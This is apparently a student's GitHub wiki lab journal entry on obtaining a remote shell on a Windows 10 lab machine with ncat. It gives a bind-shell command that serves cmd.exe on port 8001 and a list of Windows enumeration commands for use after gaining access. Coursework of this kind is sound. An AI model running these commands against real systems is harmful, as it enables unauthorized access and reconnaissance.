SEC 110 Week 6 Lab - Caden-Gallup/TechJournal GitHub Wiki
Popping Shells Lab
What we did
In our lab today, we took the roles of two different individuals to obtain a shell on a remote system. We used ncat to get the Shell on a Windows 10 Virtual Machine. The lab was to show us how an attacker would obtain a shell and how the attacker could decide which port to use and open the target's systems. This works if the victim is even on a Firewall. The victim would be tricked into opening a document or something else that would connect back to the attacker's Computer, giving them a shell to access their data.
Basic Commands Used
-
ncat -l 8001 -e cmd.exe -v
Explanation: This started a listener on port 8001; when you connect, it will boot cmd.exe. -v is Verbose mode and allows you to see what is happening -
ncat X.X.X.X 8001 Explanation: Connects to the Target IP on Port 8001
Important Terms
- NMap - Network Mapper
- Shell - A command line interface that allows us to talk to a machine via a command prompt
- Ip Address - A unique string of numbers that identify a device on a network
Useful Commands in the Shell
-
Get the list of local users - net users
-
Enumerate other hosts - net view
-
Enumerate users on the domain - net users /DOMAIN
-
List running processes - tasklist
-
List of services - tasklist /svc
-
allows enumeration of the internal systems without special tools like Nmap - arp -a
-
After getting arp -a and the IP Addresses - tasklist /s IP_ADDRESS
-
Get installed software versions - wmic product get name, version, installlocation
-
Running process details - wmic process
-
OS Details - wmic os
-
User account details - wmic useraccount
-
Detailed host information - sysinfo